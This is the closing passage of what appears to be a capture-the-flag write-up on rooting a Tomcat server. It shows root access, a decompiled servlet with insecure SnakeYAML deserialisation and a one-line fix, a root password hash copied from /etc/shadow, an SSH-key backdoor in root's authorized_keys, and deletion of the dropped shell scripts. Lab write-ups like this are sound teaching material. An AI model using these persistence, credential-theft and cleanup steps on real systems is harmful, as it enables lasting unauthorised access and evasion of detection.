class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root
uid=0(root) gid=0(root) groups=0(root)</span></span></span></code></pre></li><li id="https://www.notion.so/d747688cbf774365896373ba1c0d388b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root flag!</span></span></li></ul><h2 id="https://www.notion.so/76113525210c4c50910dc08ee44c07f3" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/76113525210c4c50910dc08ee44c07f3"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Post-exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/bde5afc190994ba982205a03d0f39ac0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Decompiling </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Servlet.class</code></span><span class="SemanticString"> in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/opt/tomcat/webapps/yaml/WEB-INF/classes/</code></span><span class="SemanticString"> with Procyon:</span></span><div id="https://www.notion.so/6674ff6f3cf74b7283b9e95a43ed8d1d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ procyon Servlet.class -o .</code></span></span></p></div></li><li id="https://www.notion.so/77b0949930d84a218656521571b519cf" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Servlet.java</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/d594ab18fa604efa94d04b6cc42581f3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token annotation punctuation">@WebServlet</span><span class="token punctuation">(</span>name <span class="token operator">=</span> <span class="token string">"Servlet"</span><span class="token punctuation">)</span>
<span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">Servlet</span> <span class="token keyword">extends</span> <span class="token class-name">HttpServlet</span>
<span class="token punctuation">{</span>
<span class="token keyword">protected</span> <span class="token keyword">void</span> <span class="token function">doPost</span><span class="token punctuation">(</span><span class="token keyword">final</span> <span class="token class-name">HttpServletRequest</span> request<span class="token punctuation">,</span> <span class="token keyword">final</span> <span class="token class-name">HttpServletResponse</span> response<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">ServletException</span><span class="token punctuation">,</span> <span class="token class-name">IOException</span> <span class="token punctuation">{</span>
<span class="token keyword">final</span> <span class="token class-name">String</span> f <span class="token operator">=</span> request<span class="token punctuation">.</span><span class="token function">getParameter</span><span class="token punctuation">(</span><span class="token string">"data"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">final</span> <span class="token class-name">Yaml</span> yaml <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Yaml</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">final</span> <span class="token class-name">Object</span> obj <span class="token operator">=</span> yaml<span class="token punctuation">.</span><span class="token function">load</span><span class="token punctuation">(</span>f<span class="token punctuation">)</span><span class="token punctuation">;</span>
response<span class="token punctuation">.</span><span class="token function">getWriter</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">append</span><span class="token punctuation">(</span><span class="token string">"Due to security reason this feature has been temporarily on hold. We will soon fix the issue!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">protected</span> <span class="token keyword">void</span> <span class="token function">doGet</span><span class="token punctuation">(</span><span class="token keyword">final</span> <span class="token class-name">HttpServletRequest</span> request<span class="token punctuation">,</span> <span class="token keyword">final</span> <span class="token class-name">HttpServletResponse</span> response<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">ServletException</span><span class="token punctuation">,</span> <span class="token class-name">IOException</span> <span class="token punctuation">{</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/e107645b5f20400b8d1a21dd60aba226" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We see that the YAML input </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">f</code></span><span class="SemanticString"> is still being deserialised insecurely, before the error response is even sent back to the user:</span></span><pre id="https://www.notion.so/4500a2859ed945e29aa4b7fb8dd56feb" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">final</span> <span class="token class-name">Object</span> obj <span class="token operator">=</span> yaml<span class="token punctuation">.</span><span class="token function">load</span><span class="token punctuation">(</span>f<span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre></li><li id="https://www.notion.so/aef487804b2546c78f677008b240c2cf" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Patching this would have simply been the case of editing one line of code:</span></span><pre id="https://www.notion.so/f10b808dbbc146fab0f5b087fd3ac058" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">protected</span> <span class="token keyword">void</span> <span class="token function">doPost</span><span class="token punctuation">(</span><span class="token keyword">final</span> <span class="token class-name">HttpServletRequest</span> request<span class="token punctuation">,</span> <span class="token keyword">final</span> <span class="token class-name">HttpServletResponse</span> response<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">ServletException</span><span class="token punctuation">,</span> <span class="token class-name">IOException</span> <span class="token punctuation">{</span>
<span class="token keyword">final</span> <span class="token class-name">String</span> f <span class="token operator">=</span> request<span class="token punctuation">.</span><span class="token function">getParameter</span><span class="token punctuation">(</span><span class="token string">"data"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">final</span> <span class="token class-name">Yaml</span> yaml <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Yaml</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">Constructor</span><span class="token punctuation">(</span><span class="token class-name">SafeClass</span><span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// using safe constructor</span>
<span class="token keyword">final</span> <span class="token class-name">Object</span> obj <span class="token operator">=</span> yaml<span class="token punctuation">.</span><span class="token function">load</span><span class="token punctuation">(</span>f<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span></span></span></span></code></pre></li></ul><h2 id="https://www.notion.so/e31d18dcae354279b51f370023d07ecd" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/e31d18dcae354279b51f370023d07ecd"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/6101b95a5a444823854d59e3c2a24461" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root user's hash from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/shadow</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/864d80bfaf7640a9b12634e3dd8c2748" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root:$6$oPgtRE0IgWrXKitG$Z5FyXxEXm5l.skZbIBKm0poPFPUxgZVY5DPii0DFsQgSBiL98ioRBuHDVzOHaZCgH.xyLnpGIksHlfBXC4LQo/:18554:0:99999:7:::</span></span></span></code></pre></li><li id="https://www.notion.so/83b5f9845e084f029f7fa568536015ec" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Maintaining access by adding our public key to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/root/.ssh/authorized_keys</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/67173dd8e4b448f88c0cedee82e96c53" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "ssh-rsa ..." > ~/.ssh/authorized_keys</code></span></span></p></div></li><li id="https://www.notion.so/349f562fca87405f9b8eab19294d9a9e" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Clean up after ourselves:</span></span><div id="https://www.notion.so/37ef57ecfe684c7789bba4656fcddb3e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ rm /dev/shm/rev.sh /dev/shm/shell.py /dev/shm/main.wasm /dev/shm/deploy.sh</code></span></span></p></div></li></ul><h2 id="https://www.notion.so/6dcb0fe7e8474cc1bd16644a7377b370" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/6dcb0fe7e8474cc1bd16644a7377b370"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/5d6e9c5bfba743e3a4d4f9fdb83ef992" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.appmarq.com/public/security,1039056,Avoid-insecure-use-of-YAML-deserialization-when-using-SnakeYaml-JEE">https://www.appmarq.com/public/security,1039056,Avoid-insecure-use-of-YAML-deserialization-when-using-SnakeYaml-JEE</a></span></span></li><li id="https://www.notion.so/10dfb9b288bf492983d1989fea0ba581" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/mbechler/marshalsec/blob/master/marshalsec.pdf">https://github.com/mbechler/marshalsec/blob/master/marshalsec.pdf</a></span></span></li><li id="https://www.notion.so/9982417a81d64b5cbddcfadf9087cc56" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858">https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858</a></span></span></li><li id="https://www.notion.so/7246afac060349fe81fe9957a8651bb0" class="NumberedList" value="4"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/artsploit/yaml-payload">https://github.com/artsploit/yaml-payload</a></span></span></li><li id="https://www.notion.so/fb7ea6060fc8416490402c180b0c7125" class="NumberedList" value="5"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://webassembly.github.io/wabt/demo/wasm2wat/index.html">https://webassembly.github.io/wabt/demo/wasm2wat/index.html</a></span></span></li><li id="https://www.notion.so/7abd38f24d30418296813ac88fe2e05a" class="NumberedList" value="6"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://webassembly.github.io/wabt/demo/wat2wasm/index.html">https://webassembly.github.io/wabt/demo/wat2wasm/index.html</a></span></span></li></ol></article>
<footer class="Footer">
<div>[email protected]~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>